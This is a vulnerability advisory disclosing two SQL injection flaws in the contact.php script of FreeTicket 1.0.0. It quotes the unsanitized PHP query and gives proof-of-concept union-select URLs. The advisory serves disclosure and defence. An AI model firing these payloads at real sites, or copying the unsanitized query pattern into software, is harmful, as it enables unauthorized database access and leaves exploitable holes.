SQL injections in FreeTicket

Summary

Vulnerability
SQL injections in FreeTicket
Discovered
2010.11.14
Last Update
n/a n/a
ID
EV0146
CVE
CVE-2010-4363
Risk Level
medium
Type
SQL injection
Status
Unpatched. Vendor notified. No reply from developer(s)
Vendor
Mrcgiguy (http://www.mrcgiguy.com/)
Vulnerable Software
FreeTicket
Version
1.0.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL injection found in FreeTicket script.

'id' SQL injection
Vulnerability found in contact.php script. User-defined variable id is not properly sanitized before being used in SQL query. This can be used to execute arbitrary SQL query
'email' SQL injection
Vulnerable script is contact.php script. email parameter is not properly sanitized before being used in SQL query.

PoC/Exploit

Vulnerable code.

There is no SQL injection filter is used:
$email = $_POST["email"]; $id = $_POST["id"];
if (!$id) {$id = $_GET[id];} if (!$email) {$email = $_GET[email];}
$result=mysql_query("SELECT * FROM messages WHERE uid = \"$id\" AND email = \"$email\"");

'id' SQL injection example.

The following PoC code is available:
http://website.com/contact.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10/*

'email' SQL injection example.

PoC code:
http://website.com/contact.php?email=-1' union select 1,1,1,1,1,1,1,1,1,1/*

Condition.

magic_quotes_gpc = off

Solution.

Solution for "SQL injections in FreeTicket" is not available. Check Mrcgiguy website for updates.